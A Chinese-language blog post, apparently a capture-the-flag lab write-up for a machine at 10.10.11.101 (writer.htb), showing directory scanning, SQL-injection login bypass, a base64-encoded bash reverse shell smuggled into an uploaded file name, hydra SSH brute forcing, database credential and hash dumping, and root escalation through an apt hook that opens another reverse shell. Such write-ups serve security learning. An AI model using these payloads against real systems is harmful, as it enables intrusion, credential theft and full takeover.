SugarCrash!

记录学习,想找个师傅带带我

0%

Driver

收集


扫目录

1
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e -t 100 -u http://10.10.11.101/
1
2
http://10.10.11.101/static/ 一个目录遍历 http://10.10.11.101/administrative 一个后台,好像也不是cms ,
测下弱口令和注入

登录哪里抓包,跑到一个注入,登录框的注入,一般应该还有万能密码登录

1
2
3
4
跑个万能密码的字典应该也能进 
admin ' or '1'='1
admin ' or '1'='1
登录成功


读取/etc/passwd文件
load_file函数读取

进入后台翻一下,发现有上传文件的功能,但是只能上传图片,

裁剪做成字典

1
2
利用这个先写一个密码字典,放到passwd做个登录名字典 
cut -d : -f 1 passwd >user
1
2
3
4
5
6
7
8
9
10
用kali做一个图片马 

echo -n '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.14/1234 0>&1"' | base64

得到一个base64
L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTQvMTIzNCAwPiYxIg==

touch '1.jpg; `echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTQvMTIzNCAwPiYxIg==| base64 -d | bash`;'

file:///var/www/writer.htb/writer/static/img/1.jpg; `echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTQvMTIzNCAwPiYxIg==| base64 -d | bash`;#

在home下ls发现两个账户 john kyle

1
九头蛇跑密码 hydra -l kyle -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt 10.10.11.101 ssh
1
2
3
4
5
6
7
进数据库拿kyle的hash,先拿数据库的账号和密码 
cd /etc/mysql
cat mariadb.cnf

拿到密码登录mysql
user = djangouser
password = DjangoSuperPassword

1
2
3
4
5
6
7
mysql -u djangouser -h 127.0.0.1 -p DjangoSuperPassword 
show databases;
use dev;
show tables;
SELECT * FROM auth_user;

拿到hash值去hashcat或john爆破
1
2
3
kyle 
marcoantonio
ssh kyle@10.10.11.101

提权

准备两个脚本 python -m SimpleHTTPServer 80 传上去

提权

https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/

1
2
3
4
5
6
7
cd /etc/apt/apt.conf.d 
echo 'apt::Update::Pre-Invoke {"echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTQvMTAwODYgMD4mMSI= | base64 -d | bash"};'> pwn

base64 的东西
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.14/10086 0>&1"

nc -nvlp 10086 多等会儿,root权限就来了最后一个在root下 cat root.txt就行了

总结

这个靶场学到的东西就是拿到shell翻数据库文件,信息收集,提权这是干了个啥??

Uploading file...vfagm